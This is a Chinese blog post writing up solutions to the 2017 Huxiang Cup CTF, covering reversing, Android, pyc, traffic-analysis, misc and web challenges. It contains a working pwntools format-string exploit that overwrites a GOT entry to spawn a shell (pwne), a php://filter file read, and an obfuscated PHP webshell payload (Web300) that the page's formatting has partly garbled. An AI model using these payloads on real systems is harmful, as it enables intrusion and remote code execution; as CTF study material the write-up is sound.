<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="ctf,re,writeup," />





  <link rel="alternate" href="/atom.xml" title="Vicen Blog" type="application/atom+xml" />






<meta name="description" content="趁着周末打了湖相杯的复赛，槽点很多，不想说话，做了3R2M1P，可能题目质量比较水，感觉大家得分都超级高，水平不济，多请原谅。 1、Re4newerpeid查壳，发现是upx，脱壳后拖进ida查看源码主程序就是和字符串异或对比">
<meta name="keywords" content="ctf,re,writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="writeup for 2017湖湘杯">
<meta property="og:url" content="http://yoursite.com/2017/11/26/wp-2017-hxb/index.html">
<meta property="og:site_name" content="Vicen Blog">
<meta property="og:description" content="趁着周末打了湖相杯的复赛，槽点很多，不想说话，做了3R2M1P，可能题目质量比较水，感觉大家得分都超级高，水平不济，多请原谅。 1、Re4newerpeid查壳，发现是upx，脱壳后拖进ida查看源码主程序就是和字符串异或对比">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://i4.bvimg.com/620384/69750cc1d85ab06b.png">
<meta property="og:image" content="http://i4.bvimg.com/620384/97f6767af0d8638e.png">
<meta property="og:image" content="http://i4.bvimg.com/620384/b98a2047da99ec24.png">
<meta property="og:image" content="http://i2.bvimg.com/620384/c0e85db215069132.png">
<meta property="og:image" content="http://i2.bvimg.com/620384/c8c6cb7dd04c315f.png">
<meta property="og:image" content="http://i2.bvimg.com/620384/d6edbb10260d8787.png">
<meta property="og:image" content="http://i2.bvimg.com/620384/820f5c9c41e5f72c.png">
<meta property="og:image" content="http://i2.bvimg.com/620384/86f80c4861bb3a85.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/f582b417f83ec9f2.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/e5854a8fb5d6c6ee.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/9b048f3d0a4a805e.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/3eb9a8526706cf47.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/c4a7348e6b99aa34.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/ca129bf640e11dd3.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/a5e3912c0d2f8f4c.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/23a9f5035bcf0d42.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/2b1912902b99b801.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/6b5fa7f98b64dc3e.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/e5b0c930de5a21d4.png">
<meta property="og:image" content="http://i1.bvimg.com/620384/68ff2a60797987e6.png">
<meta property="og:updated_time" content="2017-11-25T17:01:56.703Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="writeup for 2017湖湘杯">
<meta name="twitter:description" content="趁着周末打了湖相杯的复赛，槽点很多，不想说话，做了3R2M1P，可能题目质量比较水，感觉大家得分都超级高，水平不济，多请原谅。 1、Re4newerpeid查壳，发现是upx，脱壳后拖进ida查看源码主程序就是和字符串异或对比">
<meta name="twitter:image" content="http://i4.bvimg.com/620384/69750cc1d85ab06b.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/11/26/wp-2017-hxb/"/>





  <title>writeup for 2017湖湘杯 | Vicen Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Vicen Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Only when you plant the flowers can you really smell their fragrance.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-album">
          <a href="/photos/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            album
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/11/26/wp-2017-hxb/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Vicen">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/assets/img/touxiang.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Vicen Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">writeup for 2017湖湘杯</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-11-26T00:00:47+08:00">
                2017-11-26
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-comment-o"></i>
              </span>
              
                <a href="/2017/11/26/wp-2017-hxb/#SOHUCS" itemprop="discussionUrl">
                  <span id="changyan_count_unit" class="post-comments-count hc-comment-count" data-xid="2017/11/26/wp-2017-hxb/" itemprop="commentsCount"></span>
                </a>
              
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>趁着周末打了湖相杯的复赛，槽点很多，不想说话，做了<strong>3R2M1P</strong>，可能题目质量比较水，感觉大家得分都超级高，水平不济，多请原谅。</p>
<h1 id="1、Re4newer"><a href="#1、Re4newer" class="headerlink" title="1、Re4newer"></a>1、Re4newer</h1><p>peid查壳，发现是upx，脱壳后拖进ida查看源码<br>主程序就是和字符串异或对比  </p>
<p><img src="http://i4.bvimg.com/620384/69750cc1d85ab06b.png" alt=""></p>
<a id="more"></a>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;math.h&gt;</span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">	int i;</span><br><span class="line">	char v[100]=&#123;0x44,0x4E,0x43,0x45,0x59,0x76,0x4A,0x13,0x51,0x7D,0x4B,0x71,0x7D,0x63,0x7D,0x54</span><br><span class="line">,0x11,0x50,0x5B,0x7D,0x51,0x4B,0x4F,0x52,0x4E,0x47,0x7D,0x70,0x70,0x70,0x67,0x67</span><br><span class="line">,0x67,0x7D,0x57,0x7D,0x52,0x63,0x51,0x71,0x7D,0x13,0x56,0x5F&#125;;</span><br><span class="line">	for (i=0;i&lt;44;i++)</span><br><span class="line">	printf(&quot;%c&quot;,v[i]^0x22);</span><br><span class="line">return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>得到flag{Th1s_iS_A_v3ry_simple_RRREEE_u_pAsS_1t}</p>
<h1 id="2、简单的android"><a href="#2、简单的android" class="headerlink" title="2、简单的android"></a>2、简单的android</h1><p>查看源码，flag就在源码里面……  </p>
<p><img src="http://i4.bvimg.com/620384/97f6767af0d8638e.png" alt=""></p>
<p>#3、Pyc分析<br>首先用uncompyle2把pyc反编译成py文件</p>
<blockquote>
<p>python -u “+unPath+”\scripts\uncompyle2 “ + file + “&gt;” + newname  </p>
</blockquote>
<p>看到代码的一刻我是崩溃的…一共就一行超长代码，还看不懂，果断放弃直接逆向分析……执行一下程序，发现是有规律的，分组加密，4位一组，可以得到3位密文，每组加密互不相关，这样的话就可以直接爆破了。刚开始直接用4位爆破，速度感人，所以再观察一下，继续测试发现，每组是有规律的，大概是这样  </p>
<p><img src="http://i4.bvimg.com/620384/b98a2047da99ec24.png" alt=""></p>
<p>（其中把每位密文以16进制形式输出，写成xx的形式）<br>于是开始优化代码，代码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">import os</span><br><span class="line"></span><br><span class="line">import binascii</span><br><span class="line"></span><br><span class="line">key=&quot;qKeywrtuiopasdfghjklzxcvbnm1234567890-_QWERTYUIOPASDFGHJLZXCVBNM&quot;</span><br><span class="line"></span><br><span class="line">secret = open(&quot;kk.enc&quot;, &apos;r&apos;)</span><br><span class="line"></span><br><span class="line">mm=secret.read()</span><br><span class="line"></span><br><span class="line">secret.close()</span><br><span class="line"></span><br><span class="line">def de(kk,w1,w2):</span><br><span class="line"></span><br><span class="line">    s=kk</span><br><span class="line"></span><br><span class="line">    flag1 = open(&quot;key.txt&quot;, &apos;w&apos;)</span><br><span class="line"></span><br><span class="line">    flag1.write(s)</span><br><span class="line"></span><br><span class="line">    flag1.close()</span><br><span class="line"></span><br><span class="line">    os.system(&quot;python revPyc.py&quot;)</span><br><span class="line"></span><br><span class="line">    flag = open(&quot;key.enc&quot;, &apos;r&apos;)</span><br><span class="line"></span><br><span class="line">    ll = flag.read()</span><br><span class="line"></span><br><span class="line">    flag.close()</span><br><span class="line"></span><br><span class="line">    a2=binascii.b2a_hex(mm[w1])</span><br><span class="line"></span><br><span class="line">    a1=binascii.b2a_hex(ll[w1])</span><br><span class="line"></span><br><span class="line">    if (a1[w2] == a2[w2]):</span><br><span class="line"></span><br><span class="line">        return 1</span><br><span class="line"></span><br><span class="line">    else:</span><br><span class="line"></span><br><span class="line">        return 0</span><br><span class="line"></span><br><span class="line">while(len(mm)&gt;0):</span><br><span class="line"></span><br><span class="line">  for i in key:</span><br><span class="line"></span><br><span class="line">     if de(i,0,1)==1:</span><br><span class="line"></span><br><span class="line">        for j in key:</span><br><span class="line"></span><br><span class="line">           ss=i+j</span><br><span class="line"></span><br><span class="line">           if (de(ss,0,0)==1)and(de(ss,1,1)==1):</span><br><span class="line"></span><br><span class="line">               for k in key:</span><br><span class="line"></span><br><span class="line">                   ss=i+j+k</span><br><span class="line"></span><br><span class="line">                   if(de(ss,1,0)==1):</span><br><span class="line"></span><br><span class="line">                       for l in key:</span><br><span class="line"></span><br><span class="line">                           ss=i+j+k+l</span><br><span class="line"></span><br><span class="line">                           if (de(ss,2,0)==1)and(de(ss,2,1)==1):</span><br><span class="line"></span><br><span class="line">                               print ss</span><br><span class="line"></span><br><span class="line">                               break</span><br><span class="line"></span><br><span class="line">  mm=mm[3:-1]</span><br></pre></td></tr></table></figure></p>
<p><img src="http://i2.bvimg.com/620384/c0e85db215069132.png" alt=""> </p>
<p>可以求出三个满足条件的flag值，均提交一次，都不可以。尝试把缀余的部分删掉，再提交，也不是，无奈之下打给主办方，主办方说Key后面的d也要删掉，这个脑洞出题人你是怎么想的，你告诉我……</p>
<h1 id="4、Encryptor-apk"><a href="#4、Encryptor-apk" class="headerlink" title="4、Encryptor.apk"></a>4、Encryptor.apk</h1><p>查看Android源码，发现是用key的<strong>md5</strong>值轮换对文件加密</p>
<p><img src="http://i2.bvimg.com/620384/c8c6cb7dd04c315f.png" alt="">  </p>
<p>因为apk中是从图库选择文件，所以猜测是png、img等图像格式，枚举每个图像文件头与密文异或得到的值，其中与png文件头异或得到的值dc647eb65e6711e155375218212b3964用我的MD5求解小脚本发现可以解出来，是Password,所以源文件是png格式</p>
<p><img src="http://i2.bvimg.com/620384/d6edbb10260d8787.png" alt="">  </p>
<p>于是读取密文与这个MD5轮换加密，求出原文件长这样</p>
<p><img src="http://i2.bvimg.com/620384/820f5c9c41e5f72c.png" alt="">  </p>
<p>得到flag（吐槽一下这个字迹，不查我的有道小词库还真不知道写的是啥，而且m要大写……）</p>
<h1 id="5、pwne"><a href="#5、pwne" class="headerlink" title="5、pwne"></a>5、pwne</h1><p>产看源码，buf指针有典型的<strong>格式化漏洞</strong>，可以leak出systerm地址，写脚本cat flag</p>
<p><img src="http://i2.bvimg.com/620384/86f80c4861bb3a85.png" alt="">  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">elf=ELF(&apos;./pwne&apos;)</span><br><span class="line">p=remote(&apos;118.190.77.112&apos;,10080)</span><br><span class="line">libc=ELF(&apos;./libc.so.6&apos;)</span><br><span class="line">p.recvuntil(&quot;WANT PLAY[Y/N]&quot;)</span><br><span class="line">p.sendline(&apos;Y&apos;)</span><br><span class="line">p.recvuntil(&apos;NAME:\n\n&apos;)</span><br><span class="line">p.sendline(&apos;%p%28$p&apos;)</span><br><span class="line">p.recvuntil(&apos;WELCOME \n&apos;)</span><br><span class="line">atoi_got=0x0804A02C</span><br><span class="line">data=p.recvline()</span><br><span class="line">data=int(data[10:20],16)</span><br><span class="line">libc_base=data-libc.symbols[&apos;_IO_2_1_stderr_&apos;]</span><br><span class="line">s_addr=libc_base+libc.symbols[&apos;system&apos;]</span><br><span class="line">s_l=s_addr&amp;0x0000ffff</span><br><span class="line">s_h=(s_addr&amp;0xffff0000)&gt;&gt;16</span><br><span class="line">p.recvuntil(&quot;AGE:\n\n&quot;)</span><br><span class="line">p.sendline(&quot;18&quot;)</span><br><span class="line">p.recvuntil(&quot;WANT PLAY[Y/N]&quot;)</span><br><span class="line">p.sendline(&apos;Y&apos;)</span><br><span class="line">p.recvuntil(&apos;NAME:\n\n&apos;)</span><br><span class="line">payload=p32(atoi_got)+p32(atoi_got+2)+&quot;%%%dc&quot;%(s_l-8)+&quot;%7$hn&quot;+&quot;%%%dc&quot;%(s_h-s_l)+&quot;%8$hn&quot;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(&quot;AGE:\n\n&quot;)</span><br><span class="line">p.sendline(&quot;/bin/sh\x00&quot;)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h1 id="6、Misc-300"><a href="#6、Misc-300" class="headerlink" title="6、Misc 300"></a>6、Misc 300</h1><p>解题思路、相关代码和Flag截图：<br>刚开始队友把图片还原了出来</p>
<p><img src="http://i1.bvimg.com/620384/f582b417f83ec9f2.png" alt=""><br>估计是看图猜人名，百度识图，谷歌识图，未果。搜题目信息</p>
<blockquote>
<p>The black pixels of a b/w image are at  </p>
</blockquote>
<p>谷歌搜到了原题。。</p>
<p><img src="http://i1.bvimg.com/620384/e5854a8fb5d6c6ee.png" alt="">  </p>
<h1 id="7、流量分析"><a href="#7、流量分析" class="headerlink" title="7、流量分析"></a>7、流量分析</h1><p>拿到流量包，协议分级发现HTTP。</p>
<p><img src="http://i1.bvimg.com/620384/9b048f3d0a4a805e.png" alt="">  </p>
<p>http conatins flag条件搜索</p>
<p><img src="http://i1.bvimg.com/620384/3eb9a8526706cf47.png" alt="">  </p>
<p>提取flag.zip后，发现ce.txt</p>
<p><img src="http://i1.bvimg.com/620384/c4a7348e6b99aa34.png" alt="">  </p>
<p>想到RGB，转换成图片。</p>
<p><img src="http://i1.bvimg.com/620384/ca129bf640e11dd3.png" alt="">  </p>
<p>得到flag。</p>
<p><img src="http://i1.bvimg.com/620384/a5e3912c0d2f8f4c.png" alt="">  </p>
<h1 id="8-Web-200"><a href="#8-Web-200" class="headerlink" title="8.Web 200"></a>8.Web 200</h1><p>提示上传PNG，正常上传后发现返回500。然后检查URL，?op=home，使用php://filter读源码。</p>
<p><img src="http://i1.bvimg.com/620384/23a9f5035bcf0d42.png" alt="">  </p>
<p>直接读flag.php。</p>
<p><img src="http://i1.bvimg.com/620384/2b1912902b99b801.png" alt=""><br><img src="http://i1.bvimg.com/620384/6b5fa7f98b64dc3e.png" alt="">  </p>
<h1 id="9-Web150"><a href="#9-Web150" class="headerlink" title="9.Web150"></a>9.Web150</h1><p>这题上午没法做，下午修题了才做出来。<br>.index.php.swp源码泄露。</p>
<p><img src="http://i1.bvimg.com/620384/e5b0c930de5a21d4.png" alt="">  </p>
<p>mt_srand()随机数能够预测到。搭建相同环境可以推出相同的随机数。Ubuntu12上用PHP5写同样的create_password函数即可。</p>
<p><img src="http://i1.bvimg.com/620384/68ff2a60797987e6.png" alt="">  </p>
<p>直接使用PHP curl提交，防止使用Python造成字符串编码。然而有个问题，我没有处理Cookie的问题，本想接下来处理，为啥直接出flag了？<br>5.Web300<br>封锁了字母+数字，以及一定的特殊符号，但是没有ban <em>();[]$，就可以构造了。参考Webshell混淆的思路，构造出一个来。<br><a href="http://114.215.71.135:10080/?content=$" target="_blank" rel="noopener">http://114.215.71.135:10080/?content=$</a></em>=’’;$<em>[%2b$</em>]%2b%2b;$<em>=$</em>.’’;$<strong>=$<em>[%2b’’];$</em>=$</strong>;$<strong><em>=$</em>;$</strong>=$<em>;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$__</em>.=$<strong>;$_</strong>.=$<strong>;$</strong>=$<em>;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$__</em>.=$<strong>;$</strong>=$<em>;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong></em>.=$<strong>;$</strong>=$<em>;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong></em>.=$<strong>;$__</strong>=’<em>‘;$__=$</em>;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$__</strong>.=$<strong>;$</strong>=$<em>;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>__.=$</strong>;$__=$</em>;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>__.=$</strong>;$<strong>=$_;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>%2b%2b;$</strong>%2b%2b;$<strong>__.=$</strong>;$<em>=$$<strong>__;$</strong></em>($<em>[</em>]);<br>菜刀用_连接就可以了。</p>
<ul>
<li>by Vicen</li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/re/" rel="tag"># re</a>
          
            <a href="/tags/writeup/" rel="tag"># writeup</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/11/23/hexo-photo/" rel="next" title="hexo插件-图片墙功能">
                <i class="fa fa-chevron-left"></i> hexo插件-图片墙功能
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="SOHUCS"></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/assets/img/touxiang.jpg"
                alt="Vicen" />
            
              <p class="site-author-name" itemprop="name">Vicen</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1、Re4newer"><span class="nav-number">1.</span> <span class="nav-text">1、Re4newer</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2、简单的android"><span class="nav-number">2.</span> <span class="nav-text">2、简单的android</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4、Encryptor-apk"><span class="nav-number">3.</span> <span class="nav-text">4、Encryptor.apk</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5、pwne"><span class="nav-number">4.</span> <span class="nav-text">5、pwne</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6、Misc-300"><span class="nav-number">5.</span> <span class="nav-text">6、Misc 300</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#7、流量分析"><span class="nav-number">6.</span> <span class="nav-text">7、流量分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#8-Web-200"><span class="nav-number">7.</span> <span class="nav-text">8.Web 200</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#9-Web150"><span class="nav-number">8.</span> <span class="nav-text">9.Web150</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
